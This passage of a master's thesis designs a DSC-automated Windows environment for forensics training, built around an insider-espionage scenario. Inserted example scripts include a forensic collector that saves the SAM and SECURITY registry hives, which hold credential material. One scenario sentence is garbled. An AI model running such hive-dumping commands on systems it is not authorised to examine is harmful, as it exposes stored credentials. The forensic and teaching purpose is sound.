Masaryk University Faculty of Informatics

Development of Environments for Trainings Aimed at Digital Forensics

Master’s Thesis

Vadim Janovskij

Brno, Spring 2018


Declaration

Hereby I declare that this paper is my original authorial work, which I have worked out on my own. All sources, references, and literature used or excerpted during elaboration of this work are properly cited and listed in complete reference to the due source.

Vadim Janovskij

Advisor: RNDr. Daniel Kouřil, Ph.D.


Acknowledgements

I would like to thank my advisor RNDr. Daniel Kouřil, Ph.D., for his guidance, ideas and all the time spent with providing me a valuable feedback.

Abstract

The aim of this thesis is to create tools for building a simulated MS Windows corporate environment suitable for forensics training. The environment created in this way is parameterizable and allows the generation of forensic footprints. The created framework includes tools for building the infrastructure, injecting security incidents and generating user activity in the systems. The first part of the thesis identifies important forensic areas in the MS Windows environment and demonstrates a possible scenario that enables effective teaching of important forensic principles and areas. It also compares available orchestration tools and picks the one best suited to the needs of the thesis. The second part describes the designed technical implementation, the deployment process, populating the environment with data and injecting cybersecurity incidents.

Keywords

Digital forensics, Training, Windows, Security incident, Desired State Configuration


Contents

Introduction
1 Background
  1.1 Digital Forensics
  1.2 KYPO – Cyber Exercise and Research Platform
2 Designing training aimed at Digital Forensics
  2.1 Training overview
  2.2 Demonstration Scenario
  2.3 Designing environment architecture
    2.3.1 Domain Controller
    2.3.2 Microsoft Exchange
    2.3.3 Microsoft Internet Information Services (IIS)
    2.3.4 Microsoft SQL Server
    2.3.5 File Share Server
3 Designing semi-automated deployment process of the environment
  3.1 Comparison of selected configuration management tools
    3.1.1 Puppet
    3.1.2 Ansible
    3.1.3 Windows Desired State Configuration (DSC)
    3.1.4 Summary
  3.2 Understanding Desired State Configuration
    3.2.1 Modes of deployment
    3.2.2 DSC Architecture Overview
  3.3 Designing solution
    3.3.1 PowerShell DSC scripts structure
    3.3.2 Deployment process
4 Building the environment
  4.1 Prerequisites
  4.2 Domain Controller
    4.2.1 Join nodes to domain
    4.2.2 Configuring shared storages
  4.3 Internet Information Services (IIS) Server
  4.4 Microsoft SQL Server
  4.5 Exchange Server
  4.6 Windows Workstations
5 Populating environment with the scenario data
  5.1 Adding users, groups, and organizational units
  5.2 Deploying web application
  5.3 Simulation of users actions
6 Security incidents injection
  6.1 Password guessing
  6.2 Phishing email
  6.3 Malware injection
  6.4 Theft of sensitive information
  6.5 Disruption of company's information services
7 Conclusion
Bibliography
A Attachments

List of Tables

2.1 Typical types of servers present in organization.
3.1 Summary of tools comparison.
4.1 An overview of virtual machines involved in demonstration scenario.


List of Figures

2.1 General structure of the training.
2.2 Stark Industries - Organization Chart.
2.3 Design of the environment architecture.
3.1 Desired State Configuration Architecture Overview.
3.2 Final DSC scripts structure.
3.3 Environment deployment process.
5.1 Organizational units and groups structure.
5.2 nopCommerce Installation page.
6.1 Attacks implemented in our sample Scenario.


Introduction

Every organization must be prepared for the possibility of cybercrime within its network or on its computer systems. An organization should have employees who can recognize crimes such as fraud, insider threats, industrial espionage, employee misuse and computer intrusion. Such employees do not need to understand all technical aspects in depth, but they should be able to determine the severity of the crime correctly and, in important cases, escalate it to forensics professionals. Every system administrator should learn how to extract key evidence from Windows systems. Forensic artifacts are sensitive data that can easily be erased by improper actions. Without proper education of IT professionals in this area, companies risk losing forensic evidence irreversibly and never identifying the responsible persons.

Education in an environment that simulates a real computer network with a realistic scenario has been shown to be highly effective. It motivates the participants, and they are more involved in the learning process. With the growth of virtualization technologies and cloud computing, the simulation of such an environment is much simpler, more scalable and more realistic. Moreover, with today's orchestration tools we are able to automate the whole deployment process and build such an environment with just a few scripts.

The purpose of this thesis is to combine available deployment automation tools and scripting to build environments aimed at digital forensics with minimum human interaction, to design a scenario that covers the basic forensic areas in the MS Windows environment, and to simulate, with automation scripts, malicious activity that leaves forensic traces.

The thesis is divided into seven chapters. Chapter 1 starts by describing digital forensics and provides reasons why it is beneficial for organizations to have forensically trained employees; then the KYPO Cyber Exercise platform is introduced. Chapter 2 presents the design of the training, the demonstration scenario and the architecture of the training environment. Chapter 3 describes the design of the environment building process: it provides a comparison of selected configuration management tools and explains why I decided to use the solution from Microsoft, then describes aspects of the selected technology and provides the design of the deployment process. Chapter 4 illustrates the steps of the deployment process and introduces the configuration scripts that have been created. Chapter 5 introduces the process of populating the environment with users and data; this is an important aspect because, before injecting the security incidents, our training environment needs to contain users and data that will be compromised. Chapter 6 describes the injection of the security incidents and analyzes the forensic footprints that have been generated in the systems. Chapter 7 summarizes the main contribution of this thesis and suggests recommendations for further work.

1 Background

In this chapter, we explain what digital forensics is and why it is important for organizations to have employees trained in this area. Then we present KYPO, the Cyber Exercise Platform on which we will deploy our training environment, and list the benefits it brings us.

1.1 Digital Forensics

Forensics [1] is the science of collecting, analyzing and reporting on digital data in a way that can be presented as evidence. The forensic investigator collects forensic artifacts, tries to build relations between them and assembles the whole picture of the incident. Examples of forensic artifacts that can be found on Windows systems:

∙ NTFS and the file system
∙ Windows prefetch files
∙ Event logs
∙ Windows shadow copies
∙ Registry
∙ Memory (memory forensics)

The results of a forensic investigation can either be presented in court or stay internal to the corporation. Today many forensic investigations are not shared with law enforcement and remain internal: organizations carry out the investigation to understand what kind of breach they had and what information was leaked. With the increasing number of cybersecurity incidents, the need for computer forensics is growing. Having a forensically trained IT team can bring the following benefits to an organization:

∙ Saving money and time. The organization does not need to outsource basic forensic investigations but can handle them with its own IT department.

∙ Identifying the compromise of important systems faster.

∙ Minimizing the disruption of the organization's daily business activities during a forensic investigation.

1.2 KYPO – Cyber Exercise and Research Platform

Our training environment is based on the KYPO platform [2]. KYPO is being developed at Masaryk University. It provides a virtualized environment in a cloud that allows the simulation of large networks, systems, services and applications. Compared to a standard cloud environment, KYPO brings the following additional benefits to our training environment:

∙ KYPO provides Windows virtual machines and takes care of the proper network configuration.

∙ The environment is isolated from the outside world, and all connections are monitored. Because we are going to inject security incidents into our environment, our systems will have vulnerabilities; the KYPO platform ensures that these vulnerabilities cannot be exploited by real attackers.

∙ KYPO provides a web portal that can be used by participants in order to interact with the sandbox and it gives a nice overview of the created environment infrastructure.

∙ Built-in monitoring is present: KYPO provides flow data and captured packets from the network links [2].

2 Designing training aimed at Digital Forensics

In this chapter, I introduce the basic design of our training, its main target group and the expected learning outcomes. Then I present the demonstration scenario and the architecture of the training environment, and show that the designed environment closely simulates an enterprise infrastructure and contains all the basic types of Windows servers.

2.1 Training overview

Participants
As mentioned, the training is aimed at IT system administrators, the people who manage an organization's network. Therefore basic knowledge of the MS Windows environment and its services is expected. Our training does not aim to educate forensics experts; for that purpose the information security trainings by the SANS Institute1 are available.

Learning outcomes
Participants are expected to learn fundamental forensic principles and practices that will help them identify the severity of a security incident correctly. They need to understand that evidence must be collected in a proper way to prevent its damage or modification: the integrity of the original evidence must be preserved.

General structure of the training
In spite of the fact that the environment is located in the cloud and is accessible worldwide, the training is designed as on-site. The instructor (coordinator) is present in the room during the learning process and is available for questions. The training is broken down into blocks: the instructor introduces a particular forensic area, and the participants then investigate this area on one of the servers that contains forensic evidence related to it. The general structure is shown in Figure 2.1. During each block the participants perform the following steps:

1. Evaluate the scene and get familiar with the investigated machine (server or workstation).
2. Find and collect the related data. Be aware of data integrity.
3. Document everything. Each forensic investigation requires maintaining a proper chain of custody.
4. Write a report.

At the end of the training, each team presents its findings. Participants work in teams of 3-4 people. Collaboration between team members is assumed; participants should communicate and share information about the investigation with each other.

Figure 2.1: General structure of the training.

1. https://www.sans.org/
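As an added worked example (it is not part of the thesis and not one of the tools it describes), the following PowerShell script carries out step 2 and the integrity part of step 3 for the artifact types listed in Section 1.1: it exports event logs, copies prefetch files, saves registry hives, lists volume shadow copies and writes a SHA-256 manifest that lets the team prove later that the copies were not altered. The evidence path, the list of logs and the host name are assumptions; it must run elevated and write only to external media, never to the volume under investigation.

```powershell
# Added example; not part of the thesis. Collects the Windows artifacts listed
# in Section 1.1 from the machine under investigation and records a SHA-256
# manifest so that later modification of the copies can be detected.
# Assumptions: elevated PowerShell 5.1 session; $EvidenceRoot is on external
# media (assumed drive E:), never on the volume being examined.
param(
    [string]$EvidenceRoot = 'E:\Evidence\' + $env:COMPUTERNAME,
    [string[]]$EventLogs  = @('Security', 'System', 'Application',
                              'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational')
)

$ErrorActionPreference = 'Stop'
New-Item -ItemType Directory -Path $EvidenceRoot -Force | Out-Null
$log = Join-Path $EvidenceRoot 'collection.log'

function Write-Log ([string]$Message) {
    # Timestamped actions are the "document everything" part of the chain of custody.
    "$((Get-Date).ToString('o')) $Message" | Tee-Object -FilePath $log -Append
}

Write-Log "Collection started by $env:USERDOMAIN\$env:USERNAME"

# 1. Event logs: export with the Windows tool instead of copying the open .evtx files.
foreach ($name in $EventLogs) {
    $dest = Join-Path $EvidenceRoot (($name -replace '[\\/]', '_') + '.evtx')
    & wevtutil.exe export-log $name $dest /ow:true
    if ($LASTEXITCODE -ne 0) { Write-Log "WARNING: export of '$name' failed (exit $LASTEXITCODE)" }
    else                     { Write-Log "Exported event log '$name' to $dest" }
}

# 2. Prefetch files: evidence of program execution (name, run count, last run times).
$pfDir = Join-Path $EvidenceRoot 'Prefetch'
New-Item -ItemType Directory -Path $pfDir -Force | Out-Null
$pf = Get-ChildItem 'C:\Windows\Prefetch' -Filter '*.pf' -ErrorAction SilentlyContinue
if ($pf) { $pf | Copy-Item -Destination $pfDir }
Write-Log "Copied $(@($pf).Count) prefetch files"

# 3. Registry hives: reg.exe save writes a consistent copy of a live hive.
foreach ($hive in 'HKLM\SYSTEM', 'HKLM\SOFTWARE', 'HKLM\SAM', 'HKLM\SECURITY') {
    $dest = Join-Path $EvidenceRoot ($hive.Split('\')[-1] + '.hiv')
    & reg.exe save $hive $dest /y | Out-Null
    Write-Log "Saved hive $hive to $dest"
}

# 4. Volume Shadow Copies: record what exists; earlier file versions can later be read
#    from the listed DeviceObject path without altering the live volume.
Get-CimInstance -ClassName Win32_ShadowCopy |
    Select-Object ID, InstallDate, VolumeName, DeviceObject |
    Export-Csv -Path (Join-Path $EvidenceRoot 'shadowcopies.csv') -NoTypeInformation
Write-Log 'Listed volume shadow copies'

# Memory is deliberately not captured here: it needs a dedicated acquisition tool
# and must be taken before any of the steps above touches the disk.

# 5. Integrity: hash every collected file. The manifest is written last; its own
#    hash is logged so it can be copied onto the custody form.
$manifest = Join-Path $EvidenceRoot 'SHA256SUMS.csv'
Get-ChildItem -Path $EvidenceRoot -Recurse -File |
    Where-Object { $_.FullName -ne $manifest } |
    Get-FileHash -Algorithm SHA256 |
    Select-Object Hash, Path |
    Export-Csv -Path $manifest -NoTypeInformation
Write-Log "Manifest written; manifest SHA-256: $((Get-FileHash $manifest -Algorithm SHA256).Hash)"

# Verification at report time: re-hash the copies and compare with the manifest.
$mismatch = Import-Csv $manifest | Where-Object {
    (Get-FileHash $_.Path -Algorithm SHA256).Hash -ne $_.Hash
}
if ($mismatch) { Write-Warning "Modified artifacts:`n$($mismatch.Path -join "`n")" }
```

The order matters: the script writes nothing to the examined volume, and it hashes after all copies are made so that the manifest covers everything, but it should itself be run from a trusted tool copy, since on a compromised host the local wevtutil.exe and reg.exe are part of the evidence, not of the toolkit.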

2.2 Demonstration Scenario

Now let us look at the scenario itself. It is important to note that this is only one of many possible scenarios. The environment and the tools that generate forensic artifacts are parameterizable and can be used to run trainings based on many other stories. The primary purpose of this demonstration scenario is to show the functionality of the designed environment and tools. It will also help us understand which infrastructure components and user actions we will need to simulate.

Insider attack

Our demonstration scenario is based on an insider attack. Insider attacks [1] occur when there is a breach of trust by employees within the organization. Insiders have legitimate access to particular systems within the company and do not need to overcome the network perimeter; therefore it is challenging to detect and protect against this type of attack. Such attacks are not rare: according to a McAfee report [3], internal actors are responsible for more than 40% of serious data breach incidents.

Scenario

Stark Industries is a leading company specializing in building aircraft engines. They sell their products through an e-commerce solution. Their website relies on Microsoft SQL Server. The company has invented a new aircraft engine. The design of this new engine is top secret, and it seems to be the most significant breakthrough in aviation since the jet engine. The technology promises to allow jet engines to run safely at higher power levels than currently possible without overheating. of the engine will allow less than three hours. One of the employees is not satisfied with his salary and asked for a pay raise. Company management declined his request multiple times. He decided to contact a rival company and offer them the design of the new engine. He developed his plan to steal the confidential documents and to disrupt the company's business in order to cause it financial loss.


Our participants play the role of senior system administrators and are called in to find out why the e-shop is not running. They need to take the necessary actions to identify the guilty persons.

Players
The organization chart of Stark Industries is shown in Figure 2.2. The three main players involved in our scenario are described below.

Jim Lumen
Java Software Developer and our insider. He owns a workstation with Windows 10 Professional. For the hacking activity, he created a server in a cloud. His aims are:

∙ Perform corporate espionage for his own financial profit. ∙ Disrupt company’s business operations and cause financial loss.

Figure 2.2: Stark Industries - Organization Chart.


John Smith
Chief Executive Officer of our organization. He has access to confidential information available only to senior management. During the day he works a lot with his mailbox in Outlook 2016.

Travis Doe
IT System Administrator, responsible for infrastructure maintenance. He has been issued a workstation with Windows 10 Professional. During his working day, he routinely connects to the database and web application servers through the Remote Desktop Protocol.

2.3 Designing environment architecture

The network infrastructure in our environment should closely simulate a real corporate network. Therefore we need to deploy all the types of servers that are common in a corporate environment. The standard types of servers implemented in organizations are listed in Table 2.1, and an example of a network containing these servers is illustrated in Figure 2.3. Now that we have defined the design of our network infrastructure, let us look at the concrete solutions offered by Microsoft. For each server we also explain why it is important for a forensic investigation.

2.3.1 Domain Controller
A Domain Controller (DC) is a server running the Active Directory [4] service. The Domain Controller is the heart of the company infrastructure. It stores information about objects in the network such as users, groups, computers, files, applications and printers. Each object has its own access control list (ACL) that defines who can access and manage it. Since Active Directory is the place where security privileges and permissions are granted, it is a favourite target for attackers and an essential part of a proper forensic investigation. Once attackers gain high privileges, e.g. Domain Admin access, they like to change permissions and rights in order to keep a back door open. The forensic examiner is responsible for checking for changes in access control lists (ACLs).

Table 2.1: Typical types of servers present in organization.

Directory server: Allows authentication and authorization of computers within the domain.
Mail server: Takes care of electronic messaging. Emails are the primary communication channel inside the organization.
Web server: Runs a web application. There are many use cases for web applications; in our case, it will be the place where the organization sells its products.
Database server: Manages the database. Our database server will maintain the collection of data for the web application running on the web server.
File share server: Provides shared storage for users' data. It does not require a separate server and could be implemented on the domain server.

Figure 2.3: Design of the environment architecture.

2.3.2 Microsoft Exchange
Microsoft Exchange [5] is the market-leading solution for electronic messaging in the corporate environment. Employees use electronic messaging daily, and today it is far more than email. Electronic messaging is no longer only about sending simple text emails with file attachments; it also acts as a personal information manager, providing storage for and access to personal calendars, personal contacts, to-do and task lists, personal journals and chat histories [5]. The Exchange server is therefore a large container of individual user mailboxes and personal information that is important for a forensic investigation. A forensic examiner should have basic knowledge of where to find the database files and how to deal with this sensitive information.

2.3.3 Microsoft Internet Information Services (IIS)
IIS [6] is a web server created by Microsoft. Web-based applications are highly popular today, and almost every organization of any importance has at least one web server in its network. Such web servers are used not only for selling products but also for intranet websites, which contain sensitive information. It is not surprising that attacks on web applications are among the most popular cyber attacks; therefore effective analysis of evidence from web servers is essential forensic knowledge.

2.3.4 Microsoft SQL Server
Microsoft SQL Server [7] is a popular commercial database solution. Microsoft offers both paid and free editions [8]; the free edition is called SQL Server Express. It has largely the same capabilities as the paid editions, but there are restrictions such as the maximum database size. SQL Server Management Studio (SSMS) is the application used for management and configuration.
A lot of valuable application data is stored in the database. The most valuable forensic evidence found on SQL Server is its logs, which include client connection logs, error logs and query logs.

2.3.5 File Share Server
File shares are sometimes easy to overlook, and this service is rarely installed on a dedicated server. Data saved on a file share is accessed using a network path. The forensic investigation of a file share is very similar to the investigation of the Windows file system. The one additional thing that should be checked is the permissions assigned to the files, in order to identify which users in the network can access a given file.

3 Designing semi-automated deployment process of the environment

Because the installation of Windows services requires a significant amount of manual clicking and can take hours, the deployment of our forensics environment should be automated and require minimum human interaction. This approach brings the following benefits:

1. Time saving during the training preparation phase.

2. Elimination of human errors.

3. Repeatability of the deployment process. The environment will be in the same state after each deployment.

4. Scalability of the training. Preparing the training for multiple groups only requires running the deployment scripts multiple times.

In this chapter, I introduce different tools for Windows automation and explain why I chose the solution from Microsoft. We then describe the architecture of the tool and, based on it, design the structure of our configuration scripts and the procedure of the environment deployment process.

3.1 Comparison of selected configuration management tools

This section describes and compares three selected orchestration technologies that support Windows systems. The list is not exhaustive, but it represents the most common open-source solutions. The following five questions are answered for each tool to help understand which solution best suits our needs:

1. In what programming language is the tool written?

2. Is the installation of an additional agent needed on the target nodes?

3. What is the format of the configuration files?

4. How many modules are available for MS Windows?

5. Is a dedicated server required?

3.1.1 Puppet

Puppet is produced by the Puppet company1, founded in 2005. Puppet is written in Ruby and introduces its own configuration language; Puppet configuration files are called manifests. There is a group of modules that allows automating common Windows tasks; the list of tasks that can be automated in the Windows environment is given in the Puppet documentation [9]. There are 11 modules that support basic Windows configuration tasks, but there is no solution for more complex tasks such as the configuration of SQL Server or Exchange Server.
The Puppet architecture [10] supports two modes of system configuration: a client-server architecture and a stand-alone architecture. In the client-server architecture, one or more servers run the Puppet master application and the managed nodes run the Puppet agent; the agent periodically contacts the master and sends information about its configuration. The stand-alone architecture works in push mode: it is run on demand and is suitable for initial server configuration. Both modes require a running Puppet agent on the managed nodes. This is not an ideal solution for us: an automated installation process for the Puppet agents would have to be designed, and the agents would consume additional CPU and memory resources on our machines. Moreover, the Puppet agent leaves additional digital footprints on our servers, which could confuse participants during the training. Puppet masters cannot run on Windows, so we would need an additional UNIX server in our infrastructure to perform the configuration.

1. https://puppet.com


3.1.2 Ansible

Another orchestration tool is Ansible [11]. Unlike Puppet, the architecture of Ansible is agentless: Windows hosts are configured over the Windows Remote Management (WinRM) protocol. Ansible primarily runs in push mode, which is analogous to Puppet's stand-alone architecture, but it supports pull mode as well. Ansible is developed in Python. This is an advantage because KYPO is developed in Python too, so the people who will prepare the training environment are already familiar with this programming language. It is also important to note that Ansible is already actively used in KYPO to prepare capture-the-flag games. Configuration files are called playbooks (the equivalent of manifests in Puppet) and are written in YAML, a simple human-readable markup language. Ansible has supported Windows since version 1.7, and there are now 83 available Windows modules [12]. But again, there are no dedicated modules for configuring SQL Server or Exchange Server; we could still write a PowerShell script for that and run it with the win_shell module. Running Ansible from MS Windows (having a Windows Server as the control node) is unsupported, so an additional UNIX server would be needed [11].

3.1.3 Windows Desired State Configuration (DSC)

Windows PowerShell Desired State Configuration [13] is the solution from Microsoft. Desired State Configuration, or DSC, is a PowerShell extension introduced as part of Windows Management Framework (WMF) 4.0, which includes Windows PowerShell 4.0. This means that it ships with Windows Server 2012 R2 and Windows 8.1; on older versions of the operating system we can obtain DSC simply by upgrading the Windows Management Framework. This is convenient because we do not need any agents: the DSC engine is built into the operating system and is driven over WinRM (the same transport as Ansible). Like Puppet and Ansible, DSC supports two modes of deployment, push and pull. Modules are written in PowerShell and configuration files use a special type of PowerShell function. The biggest advantage of DSC is the number of available modules: there are 227 different modules in the PowerShell Gallery2, including modules for managing more complex services.
Because DSC was built natively for Windows, it is closely integrated into the Windows environment. We can push our configurations directly from the Domain Controller, and we do not need to install any push server.

3.1.4 Summary

Table 3.1: Summary of tools comparison.

Tool    | Q1 Language | Q2 Agent needed | Q3 Config format    | Q4 Windows modules | Q5 Server required
Puppet  | Ruby        | Yes             | Puppet manifests    | 11                 | Yes
Ansible | Python      | No              | YAML playbooks      | 83                 | Yes
DSC     | PowerShell  | No              | PowerShell function | 227                | No

The answers to the questions posed at the beginning of this section are summarized in Table 3.1. According to the results, DSC is exactly what we are looking for. The reasons why I decided on DSC are:

∙ It has modules for all the services that we are going to have in our environment.
∙ We do not need to install any additional frameworks or agents; everything is already included in Windows PowerShell version 4.0 or newer.
∙ There is no need for a Linux server; we can push our configurations from our Domain Controller.
∙ The tool is integrated into Windows PowerShell, so no additional agent footprints are generated in the system (the DSC engine itself does log its activity to the Windows event log).
∙ Puppet and Ansible have modules that support DSC configurations, so the created configuration scripts will also be usable from Puppet and Ansible.

2. https://www.powershellgallery.com

3.2 Understanding Desired State Configuration

Now we will look at the DSC architecture and its terminology in more detail. The aim is to understand the architecture and, based on it, design the deployment process and configuration scripts in a way that suits our needs. The basic idea behind DSC is simple. Organizations and system administrators write a configuration document that describes how a certain server should be configured: "This server is a domain controller, and this is the set of services that should be running here. Also, this software should be installed, and it should be configured in this way." Such descriptions also contain recommendations on how to make the configuration consistent, reliable and secure. Desired State Configuration tries to simplify this task. To automate it, you just need to write this configuration in a way that a computer, as well as a human, can understand. Such an easy-to-read configuration is high level and does not require diving into details and specifying which exact PowerShell commands should be called. Moreover, DSC resources are written by people who are experts in that particular resource, so we can rely on a server configured in that way being reliable and meeting basic security standards and recommendations [13].

3.2.1 Modes of deployment
DSC supports two modes of deployment, referred to as push and pull configuration modes [13].

Pull
Pull mode is more suitable for occasionally connected nodes, such as IoT devices or laptops; if the device is offline, a push will simply fail. In pull mode we also need a pull server that holds the configuration files for our target nodes. It behaves like a central repository from which the nodes fetch their configuration over HTTPS, typically an Internet Information Services (IIS) web server running the DSC pull service (an SMB file share can serve the same role).

Push
Our push computer (the authoring node) needs a copy of every DSC resource that we plan to use, and each target node needs a copy of every DSC resource module used by its configuration.


The concept of DSC Resources is described more in Section 3.2.2. To put it in a nutshell, it is an equivalent of libraries in the case of programming languages.
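The choice between the two modes is made on the target node itself, in the settings of its Local Configuration Manager. As an added illustration (not taken from the thesis), the following PowerShell meta-configurations put one node into push mode and another into pull mode against an HTTPS pull server. It assumes WMF 5.0 or later (the [DSCLocalConfigurationManager()] syntax), node names dc01 and ws01, a pull server URL of our choosing, and a registration key that is kept in a file outside the script.

```powershell
# Added example, not from the thesis: LCM meta-configurations for both modes.
# Assumptions: WMF 5.0+, target nodes 'dc01' (push) and 'ws01' (pull), a pull
# server at the URL below, and its registration key stored in C:\DSC\secrets\.

# Push: the authoring node delivers MOFs over WinRM; the node applies only what it is sent.
[DSCLocalConfigurationManager()]
Configuration LcmPush {
    Node 'dc01' {
        Settings {
            RefreshMode        = 'Push'
            ConfigurationMode  = 'ApplyAndMonitor'   # report drift, do not silently repair it
            RebootNodeIfNeeded = $false
            ActionAfterReboot  = 'ContinueConfiguration'
        }
    }
}

# Pull: the node polls a central HTTPS repository and fetches its configuration by name.
[DSCLocalConfigurationManager()]
Configuration LcmPull {
    param([Parameter(Mandatory)][string]$RegistrationKey)

    Node 'ws01' {
        Settings {
            RefreshMode        = 'Pull'
            ConfigurationMode  = 'ApplyAndAutoCorrect'
            RebootNodeIfNeeded = $true
        }
        ConfigurationRepositoryWeb StarkPullServer {
            ServerURL               = 'https://pull.stark.local:8080/PSDSCPullServer.svc'
            RegistrationKey         = $RegistrationKey
            ConfigurationNames      = @('Workstation')
            AllowUnsecureConnection = $false   # HTTPS only: the key is sent in the registration request
        }
        ReportServerWeb StarkReportServer {
            ServerURL       = 'https://pull.stark.local:8080/PSDSCPullServer.svc'
            RegistrationKey = $RegistrationKey
        }
    }
}

# Compile the meta-MOFs (dc01.meta.mof, ws01.meta.mof) and apply them to both nodes.
LcmPush -OutputPath 'C:\DSC\Meta'
LcmPull -RegistrationKey (Get-Content 'C:\DSC\secrets\regkey.txt' -Raw).Trim() -OutputPath 'C:\DSC\Meta'
Set-DscLocalConfigurationManager -Path 'C:\DSC\Meta' -Verbose

# Confirm what each node will do from now on.
Get-DscLocalConfigurationManager -CimSession 'dc01', 'ws01' |
    Select-Object PSComputerName, RefreshMode, ConfigurationMode
```

Two points matter for a training environment. First, the registration key ends up in clear text inside ws01.meta.mof, so the compiled meta-MOFs should be treated as secrets and deleted after they are applied. Second, ApplyAndAutoCorrect on a pull node means the LCM will periodically undo changes that participants (or the injected attacker) make to resources it manages, which may be exactly what is wanted for a workstation baseline but would erase evidence on a machine being investigated.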

Figure 3.1: Desired State Configuration Architecture Overview.

3.2.2 DSC Architecture Overview
Figure 3.1 illustrates the main parts of the DSC architecture.

Type of nodes
In the architecture we have two types of nodes:

1. Authoring node - This is a single machine that represents a central element of our configuration process. We are sitting in front of this machine and sending configuration specifications to our target nodes.


2. Target nodes - These are the machines that we want to be configured in a certain way; for example, we want a group of our target nodes to be configured as Active Directory servers.

On the authoring node, we prepare our configuration scripts. For each type of server, that we want to have in our environment, we have a separate configuration script.

Listing 3.1: Example of Configuration file for DNS installation.

    Configuration NewDNSServer {
        Node TargetNode1 {
            # Built-in resource: installs the DNS Server role if it is missing.
            WindowsFeature DNS {
                Ensure = "Present"
                Name   = "DNS"
            }
        }
    }

    # Invoking the configuration compiles it into TargetNode1.mof.
    NewDNSServer

Configuration scripts

Listing 3.1 shows a sample configuration script for creating a DNS server. Each DSC configuration script starts with the keyword Configuration, which is basically a function: first we define the configuration (function) with a particular name, and then the configuration with that name can be invoked. The main difference between the function and Configuration keywords is that a configuration runs code whose output is a configuration document. Inside the configuration we can use not only PowerShell code but also declare resources by their keywords; these resources are the building blocks of a DSC configuration.


Resources

Resource modules are the building blocks of DSC. Each DSC resource module consists of one or more PowerShell scripts. The authoring computer and each target node need a copy of every DSC resource module used in the configuration file. To list all resources currently present on the computer we use the Get-DscResource command. If a required resource is not installed on the host, we need to either find it in the repository or create our own. The PowerShell community strongly supports DSC, and the PowerShell Gallery contains all the modules we need to build our environment; at present it includes 227 unique modules.

Managed Object Format

A PowerShell configuration script produces a Managed Object Format (MOF) file. In our case the MOF is produced by a PowerShell configuration script, but it is important to say that it can be generated by any other programming language (Python, Ruby, etc.). In fact, we could even write it in Notepad, though that is of course very impractical. MOF is a plain-text (ASCII) file that contains configuration specifications. MOF is not a script; it is a collection of text instructions written in a specific format that a computer can understand and interpret. Basically, it is a description of how we want our node to look. The MOF is the file that is sent to the LCM to configure the target node.

Local Configuration Manager

The MOF is processed by the Local Configuration Manager (LCM) on the target node. The LCM is the Windows PowerShell Desired State Configuration engine present on each target node that we manage with DSC, and it is the essential part of DSC. It reads the received configuration document (MOF file), checks whether the local computer is consistent with the provided document, calls the configuration resources and applies the necessary modifications.

3.3 Designing solution

Now that we have introduced the basic terminology and architecture of DSC, we can proceed with designing the deployment process of our forensics environment.

3.3.1 Powershell DSC scripts structure

To make our configuration more scalable and parametrizable, we will separate static data from dynamic data. By static data I mean the script commands that are the same for each deployment; dynamic data are the variables that change according to the scenario in use. Such configuration logic will allow us to change the configuration more quickly.

∙ Configuration script file - contains the static data and commands needed to build a particular server.

∙ Configuration data file - stores all the parameterizable data necessary to build a new training environment.

Therefore, when we want to change the training scenario, we only need to modify the configuration data file; the configuration script file will always stay the same.

Another improvement that brings additional scalability and transparency to our DSC scripts is made directly in the configuration data file. We add an additional ScenarioData key to the ConfigurationData hashtable (see Listing 3.2). ScenarioData contains the data that is related to the scenario and not specific to a node. The reason for separating scenario-specific data from node-related data is that trainings are typically prepared by two different teams: one team prepares the infrastructure, and the other team takes care of the scenario. Therefore the infrastructure team works only with the AllNodes part of the configuration data file, while the scenario team works only with the ScenarioData part.

As the last thing, we need a script that combines our configuration data file and configuration script file and starts the configuration process on the target node. This script expects both files to be located in the same directory. If we are going to run this script from a different location, we need to specify the paths in the input parameters.

Listing 3.2: Configuration data structure.

    @{
        # Node related data
        AllNodes = @(
            ...
        );

        # Training scenario related data
        ScenarioData = @{
            ...
        }
    }

The final structure is shown in Figure 3.2. This script structure is in line with Microsoft DSC best practices [14].

Figure 3.2: Final DSC scripts structure.
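The combining script described above, written out as an added example (it is not the thesis' own Start-*.ps1 script). It assumes the file names NewDomainControllerConfigData.psd1 and NewDomainController.ps1 and the configuration name NewDomainController; all three are parameters with defaults pointing at the script's own directory, so running it from elsewhere means passing the paths explicitly, exactly as the text requires.

```powershell
<#
  Start-Configuration.ps1 (added example, not the thesis' own script).
  Combines a configuration data file (.psd1) with a configuration script (.ps1),
  compiles the MOF and pushes it to the node(s) named in AllNodes.
  File names and the configuration name below are assumptions.
#>
param(
    [string] $ConfigDataPath    = (Join-Path $PSScriptRoot 'NewDomainControllerConfigData.psd1'),
    [string] $ConfigScriptPath  = (Join-Path $PSScriptRoot 'NewDomainController.ps1'),
    [string] $ConfigurationName = 'NewDomainController',   # name of the Configuration block in the script
    [string] $OutputPath        = (Join-Path $PSScriptRoot 'MOF')
)

$ErrorActionPreference = 'Stop'

foreach ($p in $ConfigDataPath, $ConfigScriptPath) {
    if (-not (Test-Path -Path $p -PathType Leaf)) {
        throw "Required file not found: $p"
    }
}

# Import-PowerShellDataFile (PowerShell 5+) evaluates the .psd1 in restricted
# language mode, so a tampered data file cannot execute arbitrary code here.
$configData = Import-PowerShellDataFile -Path $ConfigDataPath

# The data file must follow the structure of Listing 3.2.
if (-not $configData.ContainsKey('AllNodes')) {
    throw "$ConfigDataPath has no AllNodes section"
}
if (-not $configData.ContainsKey('ScenarioData')) {
    throw "$ConfigDataPath has no ScenarioData section"
}

# Dot-source the script so its Configuration block is defined in this scope.
. $ConfigScriptPath

# Compile: every Configuration gets an implicit -ConfigurationData parameter,
# and $ConfigurationData.ScenarioData is visible inside the configuration body.
& $ConfigurationName -ConfigurationData $configData -OutputPath $OutputPath | Out-Null

# Push the compiled MOF(s) to the target node(s).
Start-DscConfiguration -Path $OutputPath -Wait -Verbose -Force
```

The two ContainsKey checks are the only validation the design needs: the infrastructure team's AllNodes and the scenario team's ScenarioData are both mandatory, so a data file missing either section fails before anything is compiled or pushed.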

3.3.2 Deployment process

Now let's present the design of the environment deployment process. Each step is described in more detail in Chapter 4. The environment deployment process is illustrated in Figure 3.3.


Step 1: Configure Apache shared storage for large files. Here we will store the data required for the installation of different services (ISO image files, executable files, etc.).

Step 2: Configure the Windows Server that will be our authoring node, the central element of our configuration process. Install all necessary DSC resources here and create a shared folder to share these resources with all target nodes in the network.

Step 3: Promote our authoring node to a Domain Controller.

Step 4: Join all target machines to our Active Directory Domain.

Step 5: Configure IIS server from our authoring node.

Step 6: Download the required installation files from the shared storage. Install Microsoft SQL Server from our authoring node.

